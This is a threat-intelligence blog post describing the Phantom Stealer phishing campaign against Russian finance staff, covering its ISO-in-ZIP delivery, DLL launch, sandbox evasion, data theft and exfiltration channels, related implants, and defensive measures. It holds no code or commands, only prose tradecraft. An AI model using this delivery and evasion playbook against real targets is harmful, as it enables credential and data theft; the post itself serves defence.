Phantom Stealer: The Ghost That Slips Through the Inbox
- Javier Conejo del Cerro
- hace 5 horas
- 3 Min. de lectura
Ghosts are not meant to break doors down. They pass through them.
Phantom Stealer follows that same logic. It does not rely on exploits, zero-days, or noisy malware delivery. Instead, it arrives quietly, disguised as routine financial correspondence, mounts itself invisibly, and drains sensitive data before anyone realizes an intrusion has taken place.
Tracked as Operation MoneyMount-ISO, this active phishing campaign uncovered by Seqrite Labs targets Russian organizations, with a strong focus on finance and accounting departments. By abusing ISO files hidden inside ZIP attachments, attackers turn everyday administrative workflows into invisible entry points for large-scale credential and data theft.
Phase 1: The Haunting Begins — Trust in Financial Communication
The campaign’s success begins with familiarity. Victims receive phishing emails crafted to resemble legitimate financial notifications, typically urging recipients to confirm a recent bank transfer or review payment details.
Primary targets include:
Finance and accounting teams
Payroll and procurement staff
Legal departments
In many cases, the emails originate from compromised corporate mail servers, giving them an added layer of credibility. The message does not look suspicious. It looks urgent, routine, and trustworthy.
This is how the ghost enters the room.
Phase 2: The Hidden Door — ISO Files as an Invisible Vector
Attached to the phishing email is a ZIP archive that allegedly contains transaction details. Inside the ZIP is a malicious ISO image labeled as a bank transfer confirmation.
When opened, the ISO mounts automatically on Windows systems as a virtual CD drive, bypassing the suspicion often associated with executable files. To the user, nothing appears out of place.
The mounted ISO contains an embedded DLL, typically named CreativeAI.dll, which is executed to launch Phantom Stealer without requiring explicit user execution of a traditional binary.
The door was never locked. It was simply invisible.
Phase 3: The Ghost at Work — Data Theft and Evasion
Once executed, Phantom Stealer immediately focuses on harvesting valuable data while staying hidden. Its capabilities include extracting:
Cryptocurrency wallet data from Chromium browser extensions and desktop wallet apps
Browser passwords, cookies, and saved credit card details
Discord authentication tokens
Arbitrary files from the system
Keystrokes and clipboard contents
To avoid detection, Phantom Stealer performs checks to identify virtualized, sandboxed, or analysis environments. If such conditions are detected, the malware aborts execution, leaving little trace behind.
Data exfiltration is flexible and resilient, using:
Telegram bots
Attacker-controlled Discord webhooks
FTP servers
The ghost feeds quietly, then disappears.
Phase 4: Parallel Apparitions — DUPERUNNER and AdaptixC2
Alongside Operation MoneyMount-ISO, researchers observed parallel phishing campaigns targeting Russian organizations, particularly HR and payroll departments. These operations, tracked as DupeHike and attributed to UNG0902, use different lures but follow a similar deceptive philosophy.
In these campaigns:
ZIP files contain PDF and LNK decoys
The LNK file executes PowerShell to download a previously undocumented implant named DUPERUNNER
DUPERUNNER displays a decoy document while loading AdaptixC2, an open-source command-and-control framework
AdaptixC2 is injected into legitimate Windows processes such as:
explorer.exe
notepad.exe
msedge.exe
This allows attackers to blend into normal system activity while maintaining persistent remote access.
Phase 5: A Crowded Haunted House — Additional Tooling
Phantom Stealer and AdaptixC2 are not alone. Other phishing campaigns targeting finance, legal, and aerospace sectors in Russia have been observed deploying:
Cobalt Strike
Formbook
DarkWatchman
PhantomRemote
In several cases, phishing emails were sent from compromised Russian corporate infrastructure, further blurring the line between legitimate and malicious communication.
Some campaigns also redirected victims to credential-harvesting login pages hosted on IPFS and Vercel, targeting Microsoft Outlook credentials and entities such as Bureau 1440 in the Russian aerospace sector.
Phase 6: Strategic Context — Espionage, Hacktivism, and Pressure
French cybersecurity firm Intrinsec linked several aerospace-focused intrusions to hacktivist groups aligned with Ukrainian interests. Activity observed between June and September 2025 overlaps with clusters such as:
Hive0117
Operation CargoTalon
Rainbow Hyena (aka Fairy Trickster, Head Mare, PhantomCore)
These operations appear to target organizations cooperating with Russia’s military, reflecting a blend of cyber espionage, hacktivism, and geopolitical pressure rather than purely criminal motivation.
Defensive Measures: Revealing the Ghost
Defending against Phantom Stealer and related campaigns requires removing the invisibility attackers rely on.
Organizations should:
Block or restrict ISO attachments in email gateways
Treat ZIP-delivered disk images as high-risk
Monitor DLL execution from mounted virtual drives
Restrict PowerShell abuse and LNK execution
Harden email authentication and monitor internal mail abuse
Assume finance-related lures are a primary attack vector
The threat does not rely on complexity. It relies on being ignored.
Phantom Stealer is dangerous not because it breaks systems, but because it blends in. It turns standard operating procedures into silent compromises, using formats users no longer question and workflows security teams often overlook.
In an environment where attackers no longer need exploits, visibility becomes the strongest defense.
If the file looks harmless, mounts quietly, and executes without a prompt, it is already too late.
Ghosts thrive in places no one thinks to look.
The Hacker News
Comentarios